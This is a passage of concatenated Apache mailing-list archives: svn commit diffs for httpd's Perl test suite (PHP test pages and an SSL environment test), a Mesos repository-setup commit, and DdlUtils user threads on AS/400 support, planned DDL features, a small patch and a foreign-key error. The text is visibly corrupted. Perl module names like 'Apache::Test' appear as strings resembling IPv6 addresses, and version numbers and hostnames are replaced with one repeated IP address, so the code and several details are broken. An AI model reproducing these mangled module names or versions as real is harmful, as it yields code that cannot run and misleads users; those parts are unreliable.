-$file = $HTTP_SERVER_VARS["argv"][0]; +$file = $_SERVER["argv"][0]; function foo() { Modified: httpd/test/trunk/perl-framework/t/htdocs/php/var1.php URL: http://svn.apache.org/viewcvs/httpd/test/trunk/perl-framework/t/htdocs/php/var1.php?rev=331833&r1=331832&r2=331833&view=diff ============================================================================== --- httpd/test/trunk/perl-framework/t/htdocs/php/var1.php (original) +++ httpd/test/trunk/perl-framework/t/htdocs/php/var1.php Tue Nov 8 07:37:53 2005 @@ -1,10 +1,10 @@ <?php - switch ($HTTP_SERVER_VARS["REQUEST_METHOD"]) { + switch ($_SERVER["REQUEST_METHOD"]) { case "GET": - echo $HTTP_GET_VARS["variable"]; + echo $_GET["variable"]; break; case "POST": - echo $HTTP_POST_VARS["variable"]; + echo $_POST["variable"]; break; default: echo "ERROR!"; Modified: httpd/test/trunk/perl-framework/t/htdocs/php/var2.php URL: http://svn.apache.org/viewcvs/httpd/test/trunk/perl-framework/t/htdocs/php/var2.php?rev=331833&r1=331832&r2=331833&view=diff ============================================================================== --- httpd/test/trunk/perl-framework/t/htdocs/php/var2.php (original) +++ httpd/test/trunk/perl-framework/t/htdocs/php/var2.php Tue Nov 8 07:37:53 2005 @@ -1,12 +1,12 @@ <?php - switch ($HTTP_SERVER_VARS["REQUEST_METHOD"]) { + switch ($_SERVER["REQUEST_METHOD"]) { case "GET": - echo join(" ", array($HTTP_GET_VARS["v1"], - $HTTP_GET_VARS["v2"])); + echo join(" ", array($_GET["v1"], + $_GET["v2"])); break; case "POST": - echo join(" ", array($HTTP_POST_VARS["v1"], - $HTTP_POST_VARS["v2"])); + echo join(" ", array($_POST["v1"], + $_POST["v2"])); break; default: echo "ERROR!"; Modified: httpd/test/trunk/perl-framework/t/htdocs/php/var3.php URL: http://svn.apache.org/viewcvs/httpd/test/trunk/perl-framework/t/htdocs/php/var3.php?rev=331833&r1=331832&r2=331833&view=diff ============================================================================== --- httpd/test/trunk/perl-framework/t/htdocs/php/var3.php (original) +++ httpd/test/trunk/perl-framework/t/htdocs/php/var3.php Tue Nov 8 07:37:53 2005 @@ -1,14 +1,14 @@ <?php - switch ($HTTP_SERVER_VARS["REQUEST_METHOD"]) { + switch ($_SERVER["REQUEST_METHOD"]) { case "GET": - echo join(" ", array($HTTP_GET_VARS["v1"], - $HTTP_GET_VARS["v2"], - $HTTP_GET_VARS["v3"])); + echo join(" ", array($_GET["v1"], + $_GET["v2"], + $_GET["v3"])); break; case "POST": - echo join(" ", array($HTTP_POST_VARS["v1"], - $HTTP_POST_VARS["v2"], - $HTTP_POST_VARS["v3"])); + echo join(" ", array($_POST["v1"], + $_POST["v2"], + $_POST["v3"])); break; default: echo "ERROR!"; From [email protected] Wed Nov 23 14:15:55 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 94098 invoked from network); 23 Nov 2005 14:15:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Nov 2005 14:15:51 -0000 Received: (qmail 45747 invoked by uid 500); 23 Nov 2005 14:15:50 -0000 Delivered-To: [email protected] Received: (qmail 45712 invoked by uid 500); 23 Nov 2005 14:15:49 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk Reply-To: [email protected] list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <test-cvs.httpd.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 45700 invoked by uid 99); 23 Nov 2005 14:15:48 -0000 X-ASF-Spam-Status: No, hits=-9.4 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Wed, 23 Nov 2005 06:15:48 -0800 Received: (qmail 93870 invoked by uid 65534); 23 Nov 2005 14:15:27 -0000 Message-ID: <[email protected]> Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r348445 - /httpd/test/trunk/perl-framework/t/ssl/env.t Date: Wed, 23 Nov 2005 14:15:27 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.5 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Author: jorton Date: Wed Nov 23 06:15:22 2005 New Revision: 348445 URL: http://svn.apache.org/viewcvs?rev=348445&view=rev Log: - check response status to make failure due to non-2xx response obvious Modified: httpd/test/trunk/perl-framework/t/ssl/env.t Modified: httpd/test/trunk/perl-framework/t/ssl/env.t URL: http://svn.apache.org/viewcvs/httpd/test/trunk/perl-framework/t/ssl/env.t?rev=348445&r1=348444&r2=348445&view=diff ============================================================================== --- httpd/test/trunk/perl-framework/t/ssl/env.t (original) +++ httpd/test/trunk/perl-framework/t/ssl/env.t Wed Nov 23 06:15:22 2005 @@ -1,6 +1,7 @@ use strict; use warnings FATAL => 'all'; use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTest; +use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTestUtil; use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTestRequest; use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTestConfig (); use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTestSSLCA (); @@ -19,19 +20,27 @@ my $url = '/ssl-cgi/env.pl'; -my $tests = (keys(%$server_expect) + keys(%$client_expect)) * 2; +my $tests = (keys(%$server_expect) + keys(%$client_expect) + 1) * 2; plan tests => $tests, need need_cgi, need_lwp; Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTestRequestacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bscheme('https'); -my $env = getenv(GET_STR($url)); +my $r = GET($url); + +ok t_cmp($r->code, 200, "response status OK"); + +my $env = getenv($r->as_string); verify($env, $server_expect); verify($env, $client_expect, 1); $url = '/require-ssl-cgi/env.pl'; -$env = getenv(GET_STR($url, cert => $cert)); +$r = GET($url, cert => $cert); + +ok t_cmp($r->code, 200, "second response status OK"); + +$env = getenv($r->as_string); verify($env, $server_expect); verify($env, $client_expect);
From [email protected] Wed Apr 27 07:00:06 2011 Return-Path: <[email protected]> X-Original-To: [email protected] Delivered-To: [email protected] Received: from mail.apache.org (hermes.apache.org [161.129.204.104]) by minotaur.apache.org (Postfix) with SMTP id 470C02346 for <[email protected]>; Wed, 27 Apr 2011 07:00:06 +0000 (UTC) Received: (qmail 75679 invoked by uid 500); 27 Apr 2011 07:00:05 -0000 Delivered-To: [email protected] Received: (qmail 75646 invoked by uid 500); 27 Apr 2011 07:00:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <mesos-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 75629 invoked by uid 99); 27 Apr 2011 07:00:02 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 27 Apr 2011 07:00:02 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 27 Apr 2011 07:00:00 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 5FFA5238899C; Wed, 27 Apr 2011 06:59:39 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1097015 - in /incubator/mesos: branches/ tags/ trunk/ trunk/mesos/ Date: Wed, 27 Apr 2011 06:59:39 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: matei Date: Wed Apr 27 06:59:39 2011 New Revision: 1097015 URL: http://svn.apache.org/viewvc?rev=1097015&view=rev Log: Set up repository structure Added: incubator/mesos/branches/ incubator/mesos/tags/ incubator/mesos/trunk/ incubator/mesos/trunk/mesos/
From [email protected] Thu Jun 01 08:46:03 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 959 invoked from network); 1 Jun 2006 08:46:01 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 1 Jun 2006 08:46:01 -0000 Received: (qmail 73961 invoked by uid 500); 1 Jun 2006 08:46:01 -0000 Delivered-To: [email protected] Received: (qmail 73877 invoked by uid 500); 1 Jun 2006 08:46:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ddlutils-user.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 73854 invoked by uid 99); 1 Jun 2006 08:46:00 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 01 Jun 2006 01:46:00 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nf-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 01 Jun 2006 01:45:58 -0700 Received: by nf-out-0910.google.com with SMTP id c29so474632nfb for <[email protected]>; Thu, 01 Jun 2006 01:45:37 -0700 (PDT) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=PDP2MWz9eHk3vVz20D16Wa4SB3xd/G6WzYtWlPRykLAhG7P0mMloTs+ep5M2RXuJ9p7zBJ4sqc3AVy/ABbjUjyVr+yEdLRbx4X4s36PogLhGHQ4sr3WnAZqAnAd0Up7yCzIorHRu68VJ/GkIdV5qDxU3A100VLNWMwoHnSLpH9A= Received: by 161.129.204.104 with SMTP id t6mr87759nfj; Thu, 01 Jun 2006 01:45:12 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Thu, 1 Jun 2006 01:45:11 -0700 (PDT) Message-ID: <[email protected]> Date: Thu, 1 Jun 2006 10:45:12 +0200 From: "Thomas Dudziak" <[email protected]> To: [email protected] Subject: Re: Ddlutils with JTOpen In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On 5/31/06, Davide Grandi <[email protected]> wrote: > Does anybody use ddlutils against AS400-i5-system i-whatever with JTOpen ? Not that I know of, and I don't have access to an iSeries. > I tried it against an old V4R5 box and I resorted to patch the > Db2Platform, adding the subprotocol "as400" (and registering it in > PlatformUtils). > > I just got my first database model in XML ... Cool. If you could perhaps provide your changes as a patch (unified diff), then I would add them to DdlUtils. cheers, Tom From [email protected] Fri Jun 02 00:46:38 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 2254 invoked from network); 2 Jun 2006 00:46:37 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 2 Jun 2006 00:46:37 -0000 Received: (qmail 12856 invoked by uid 500); 2 Jun 2006 00:46:37 -0000 Delivered-To: [email protected] Received: (qmail 12821 invoked by uid 500); 2 Jun 2006 00:46:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ddlutils-user.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 12801 invoked by uid 99); 2 Jun 2006 00:46:37 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 01 Jun 2006 17:46:37 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO smtp104.biz.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Thu, 01 Jun 2006 17:46:35 -0700 Received: (qmail 61196 invoked from network); 2 Jun 2006 00:46:14 -0000 Received: from unknown (HELO ?161.129.204.104?) ([email protected]@161.129.204.104 with plain) by smtp104.biz.mail.mud.yahoo.com with SMTP; 2 Jun 2006 00:46:13 -0000 Message-ID: <[email protected]> Date: Thu, 01 Jun 2006 17:46:11 -0700 From: Kirk True <[email protected]> Organization: Movaris User-Agent: Thunderbird 161.129.204.104 (Windows/20060308) MIME-Version: 1.0 To: [email protected] Subject: Complex DDL Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi all, First off, great project! It's amazing the number of databases that are supported. I'm helping a client to move to a XML->SQL code generator to alleviate ongoing porting bottlenecks between the databases they support. DdlUtils looks like it meets a lot of what they need. Unfortunately, I wasn't able to determine if the following features are or will be supported: Creating sequences/sequence tables (depending on DB support) Creating views with arbitrarily complex queries Oracle tablespace clauses for table and index creation Altering table columns to allow/disallow nullness, change data size, etc. If it fits in with the goals of the project/client, I could make an effort at contributing all or part of the code. Thanks for all the hard work! Kirk From [email protected] Fri Jun 02 10:21:45 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 54647 invoked from network); 2 Jun 2006 10:21:44 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 2 Jun 2006 10:21:44 -0000 Received: (qmail 6205 invoked by uid 500); 2 Jun 2006 10:21:44 -0000 Delivered-To: [email protected] Received: (qmail 6126 invoked by uid 500); 2 Jun 2006 10:21:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ddlutils-user.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 6115 invoked by uid 99); 2 Jun 2006 10:21:44 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 02 Jun 2006 03:21:44 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=RCVD_IN_BL_SPAMCOP_NET,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nf-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 02 Jun 2006 03:21:43 -0700 Received: by nf-out-0910.google.com with SMTP id c29so1041668nfb for <[email protected]>; Fri, 02 Jun 2006 03:21:22 -0700 (PDT) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=EpmfjwXa2nOvJJI7+zWZDk+WT0epByED4Fmp1LnZaaxSBtVbXKYnn9XC/nPIaGX54NU59igr1fm2vxYIndyFC9gWezt12fCiOWeqgM6ZIyFhNkMpsNE8DOcYdnNS5DuivwFreVO8XpwUPbXs3XabKDPBRCFXYbR3TICE0VkohWw= Received: by 161.129.204.104 with SMTP id 18mr612029nfn; Fri, 02 Jun 2006 03:21:22 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Fri, 2 Jun 2006 03:21:22 -0700 (PDT) Message-ID: <[email protected]> Date: Fri, 2 Jun 2006 12:21:22 +0200 From: "Thomas Dudziak" <[email protected]> To: [email protected] Subject: Re: Complex DDL In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On 6/2/06, Kirk True <[email protected]> wrote: > I'm helping a client to move to a XML->SQL code generator to alleviate > ongoing porting bottlenecks between the databases they support. DdlUtils > looks like it meets a lot of what they need. Unfortunately, I wasn't > able to determine if the following features are or will be supported: > > Creating sequences/sequence tables (depending on DB support) This is planned, though not in the upcoming 1.0, together with (limited) procedure and trigger support. > Creating views with arbitrarily complex queries This is difficult to do in a database-independent way, esp. because of the involved query. > Oracle tablespace clauses for table and index creation This could be supported via attributes to the model elements (which would contain database-specifc settings), though it requires a change to the DTD, and thus would need to come after the 1.0. > Altering table columns to allow/disallow nullness, change data size, > etc. This is supported already. You can try it out by using the writeSchemaSqlToFile subtask (http://db.apache.org/ddlutils/ant-tasks.html#Subtask%3A+writeSchemaSqlToFile-N107F8) which simply outputs the SQL that DdlUtils would use. > If it fits in with the goals of the project/client, I could make an > effort at contributing all or part of the code. Sure, go ahead! cheers, Tom From [email protected] Sun Jun 04 22:42:23 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41446 invoked from network); 4 Jun 2006 22:42:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Jun 2006 22:42:22 -0000 Received: (qmail 68740 invoked by uid 500); 4 Jun 2006 22:42:22 -0000 Delivered-To: [email protected] Received: (qmail 68697 invoked by uid 500); 4 Jun 2006 22:42:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ddlutils-user.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 68686 invoked by uid 99); 4 Jun 2006 22:42:22 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 04 Jun 2006 15:42:22 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO swip.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 04 Jun 2006 15:42:20 -0700 X-T2-Posting-ID: nmGZE32Jp4+vNCbJE/rBbw== X-Cloudmark-Score: 0.000000 [] Received: from [161.129.204.104] (HELO [161.129.204.104]) by mailfe11.swip.net (CommuniGate Pro SMTP 5.0.8) with ESMTP id 39752993 for [email protected]; Mon, 05 Jun 2006 00:41:57 +0200 Mime-Version: 1.0 Message-Id: <a06200707c0a901e445a2@[161.129.204.104]> In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Date: Sun, 4 Jun 2006 23:57:12 +0200 To: [email protected] From: Davide Grandi <[email protected]> Subject: Re: Ddlutils with JTOpen Content-Type: text/plain; charset="us-ascii" ; format="flowed" X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N >Cool. If you could perhaps provide your changes as a patch (unified >diff), then I would add them to DdlUtils. > >cheers, >Tom Mmmh ... "unified" like that ? I'm still digging into SVN. --- Index: /Users/dgrandi/Documents/Eclipse/3.1.2/workspace/DdlUtils/src/java/org/apache/ddlutils/PlatformUtils.java =================================================================== --- /Users/dgrandi/Documents/Eclipse/3.1.2/workspace/DdlUtils/src/java/org/apache/ddlutils/PlatformUtils.java (revision 410118) +++ /Users/dgrandi/Documents/Eclipse/3.1.2/workspace/DdlUtils/src/java/org/apache/ddlutils/PlatformUtils.java (working copy) @@ -141,6 +141,7 @@ jdbcSubProtocolToPlatform.put(Db2Platform.JDBC_SUBPROTOCOL, Db2Platform.DATABASENAME); jdbcSubProtocolToPlatform.put(Db2Platform.JDBC_SUBPROTOCOL_OS390_1, Db2Platform.DATABASENAME); jdbcSubProtocolToPlatform.put(Db2Platform.JDBC_SUBPROTOCOL_OS390_2, Db2Platform.DATABASENAME); + jdbcSubProtocolToPlatform.put(Db2Platform.JDBC_SUBPROTOCOL_JTOPEN, Db2Platform.DATABASENAME); jdbcSubProtocolToPlatform.put(PlatformUtils.JDBC_SUBPROTOCOL_DATADIRECT_DB2, Db2Platform.DATABASENAME); jdbcSubProtocolToPlatform.put(PlatformUtils.JDBC_SUBPROTOCOL_INET_DB2, Db2Platform.DATABASENAME); jdbcSubProtocolToPlatform.put(DerbyPlatform.JDBC_SUBPROTOCOL, DerbyPlatform.DATABASENAME); Index: /Users/dgrandi/Documents/Eclipse/3.1.2/workspace/DdlUtils/src/java/org/apache/ddlutils/platform/db2/Db2Platform.java =================================================================== --- /Users/dgrandi/Documents/Eclipse/3.1.2/workspace/DdlUtils/src/java/org/apache/ddlutils/platform/db2/Db2Platform.java (revision 410118) +++ /Users/dgrandi/Documents/Eclipse/3.1.2/workspace/DdlUtils/src/java/org/apache/ddlutils/platform/db2/Db2Platform.java (working copy) @@ -43,6 +43,8 @@ public static final String JDBC_SUBPROTOCOL_OS390_1 = "db2os390"; /** An alternative subprotocol used by the standard DB2 driver on OS/390. */ public static final String JDBC_SUBPROTOCOL_OS390_2 = "db2os390sqlj"; + /** An alternative subprotocol used by the JTOpen driver on OS/400. */ + public static final String JDBC_SUBPROTOCOL_JTOPEN = "as400"; /** * Creates a new platform instance. --- Maybe it will grow to a XyzPlatform (may be not ...). I'm trying to shape a tool for transport tables and rows in XML back and forth from AS/400 and the other 3 platforms we use. Now I caught the tables ... Best regards, Davide Grandi --- Ing. Davide Grandi [email protected] From [email protected] Tue Jun 06 20:00:40 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 34574 invoked from network); 6 Jun 2006 20:00:40 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Jun 2006 20:00:40 -0000 Received: (qmail 50005 invoked by uid 500); 6 Jun 2006 20:00:39 -0000 Delivered-To: [email protected] Received: (qmail 49977 invoked by uid 500); 6 Jun 2006 20:00:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ddlutils-user.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 49966 invoked by uid 99); 6 Jun 2006 20:00:39 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Jun 2006 13:00:39 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO pyramid-03.kattare.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Jun 2006 13:00:38 -0700 Received: from [161.129.204.104] (ip70-187-212-165.dc.dc.cox.net [161.129.204.104]) (authenticated bits=0) by pyramid-03.kattare.com (8.13.6/8.13.6) with ESMTP id k56K0I3h016382 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO) for <[email protected]>; Tue, 6 Jun 2006 13:00:20 -0700 Message-ID: <[email protected]> Date: Tue, 06 Jun 2006 16:00:18 -0400 From: Terry Steichen <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20060308) MIME-Version: 1.0 To: [email protected] Subject: Foreign Key problem Content-Type: multipart/alternative; boundary="------------080801010104070702000604" X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N --------------080801010104070702000604 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit I used ddlutils to dump a schema and contents of an existing (Derby 161.129.204.104) database, containing four tables (PERSPECTIVE, S_POS, WIKI_PAGE and WIKI_PAGE_VERSIONS). When I try to create a new database using the dumped schema and data, I get an exception, saying that an insert to one of my tables (S_POS) violates the associated foreign key. (S_POS:PERSPECTIVE_ID->PERSPECTIVE:ID). If I remove the foreign key specification from the schema, it seems to work fine in creating a new database. What's particularly puzzling is that two of my other tables are also linked via a foreign key (WIKI_PAGE_VERSIONS:VERSION_NAME->WIKI_PAGE:PAGE_NAME) and it works just fine - no [email protected]. I have three questions: (1) why is the first foreign key specification causing a problem? (2) why is the second foreign key specification working fine? (3) what is the consequence of simply removing the foreign key (and creating the database without it)? Below is the schema, followed by the stacktrace. TIA, Terry Steichen PS: I can't find the version of ddlutils - but I just checked the source out from svn today and built it. ================= schema =============================== <database name="MyModel"> <table name="PERSPECTIVE"> <column name="ID" primaryKey="true" required="true" type="INTEGER" size="10" autoIncrement="true"/> <column name="LOG_NAME" primaryKey="false" required="false" type="VARCHAR" size="30" autoIncrement="false"/> <column name="PERS_NAME" primaryKey="false" required="false" type="VARCHAR" size="60" autoIncrement="false"/> <column name="DESCRIPTION" primaryKey="false" required="false" type="CLOB" size="1048576" autoIncrement="false"/> <column name="VISIBILITY" primaryKey="false" required="false" type="INTEGER" size="10" autoIncrement="false"/> <column name="AUTHORITY" primaryKey="false" required="false" type="CLOB" size="1048576" autoIncrement="false"/> <column name="VERIFICATION" primaryKey="false" required="false" type="INTEGER" size="10" autoIncrement="false"/> </table> <table name="S_POS"> <column name="ID" primaryKey="true" required="true" type="INTEGER" size="10" autoIncrement="true"/> <column name="PAGE_NAME" primaryKey="false" required="false" type="VARCHAR" size="60" autoIncrement="false"/> <column name="VERSION" primaryKey="false" required="false" type="INTEGER" size="10" autoIncrement="false"/> <column name="STRENGTH" primaryKey="false" required="false" type="INTEGER" size="10" autoIncrement="false"/> <column name="TOPIC" primaryKey="false" required="false" type="VARCHAR" size="30" autoIncrement="false"/> <column name="LEVEL" primaryKey="false" required="false" type="VARCHAR" size="8" autoIncrement="false"/> <column name="PARENT_PAGE" primaryKey="false" required="false" type="VARCHAR" size="60" autoIncrement="false"/> <column name="MTIME" primaryKey="false" required="false" type="TIMESTAMP" size="26" autoIncrement="false"/> <column name="PERSPECTIVE_ID" primaryKey="false" required="false" type="INTEGER" size="10" autoIncrement="false"/> <!-- *this is the offending element* <foreign-key foreignTable="PERSPECTIVE" name="SQL060531032406571"> <reference local="PERSPECTIVE_ID" foreign="ID"/> </foreign-key> --> <index name="IX2_S_POS"> <index-column name="PAGE_NAME"/> </index> </table> <table name="WIKI_PAGE"> <column name="PAGE_NAME" primaryKey="true" required="true" type="VARCHAR" size="100" autoIncrement="false"/> <column name="PAGE_VERSION" primaryKey="false" required="false" type="INTEGER" size="10" default="0" autoIncrement="false"/> <column name="PAGE_MODIFIED" primaryKey="false" required="false" type="TIMESTAMP" size="26" autoIncrement="false"/> <column name="PAGE_MODIFIED_BY" primaryKey="false" required="false" type="VARCHAR" size="50" autoIncrement="false"/> <column name="PAGE_TEXT" primaryKey="false" required="false" type="CLOB" size="1048576" autoIncrement="false"/> <index name="IX_PAGE_MODIFIED"> <index-column name="PAGE_MODIFIED"/> </index> </table> <table name="WIKI_PAGE_VERSIONS"> <column name="VERSION_NAME" primaryKey="true" required="true" type="VARCHAR" size="100" autoIncrement="false"/> <column name="VERSION_NUM" primaryKey="true" required="true" type="INTEGER" size="10" default="0" autoIncrement="false"/> <column name="VERSION_MODIFIED" primaryKey="false" required="false" type="TIMESTAMP" size="26" autoIncrement="false"/> <column name="VERSION_MODIFIED_BY" primaryKey="false" required="false" type="VARCHAR" size="50" autoIncrement="false"/> <column name="VERSION_TEXT" primaryKey="false" required="false" type="CLOB" size="1048576" autoIncrement="false"/> <!-- *this foreign key element works fine* --> <foreign-key foreignTable="WIKI_PAGE" name="FK_WIKI_PAGE_VERSIONS_WIKI_PAGE"> <reference local="VERSION_NAME" foreign="PAGE_NAME"/> </foreign-key> </table> </database> =================== trace ========================= F:\components\ddlutils>ant -buildfile derby_create.xml Buildfile: derby_create.xml database-setup: [ddlToDatabase] Read schema file F:\components\ddlutils\db-schema.xml [ddlToDatabase] Created database [ddlToDatabase] Jun 6, 2006 3:54:36 PM org.apache.ddlutils.alteration.ModelComparator compare [ddlToDatabase] INFO: Table PERSPECTIVE needs to be added [ddlToDatabase] Jun 6, 2006 3:54:36 PM org.apache.ddlutils.alteration.ModelComparator compare [ddlToDatabase] INFO: Table S_POS needs to be added [ddlToDatabase] Jun 6, 2006 3:54:36 PM org.apache.ddlutils.alteration.ModelComparator compare [ddlToDatabase] INFO: Table WIKI_PAGE needs to be added [ddlToDatabase] Jun 6, 2006 3:54:36 PM org.apache.ddlutils.alteration.ModelComparator compare [ddlToDatabase] INFO: Table WIKI_PAGE_VERSIONS needs to be added [ddlToDatabase] Jun 6, 2006 3:54:37 PM org.apache.ddlutils.platform.PlatformImplBase evaluateBatch [ddlToDatabase] INFO: Executed 8 SQL command(s) with 0 error(s) [ddlToDatabase] Written schema to database [ddlToDatabase] Jun 6, 2006 3:54:38 PM org.apache.ddlutils.platform.PlatformImplBase insert [ddlToDatabase] WARNING: The database does not support querying for auto-generated pk values [ddlToDatabase] Jun 6, 2006 3:54:38 PM org.apache.ddlutils.platform.PlatformImplBase insert [ddlToDatabase] WARNING: The database does not support querying for 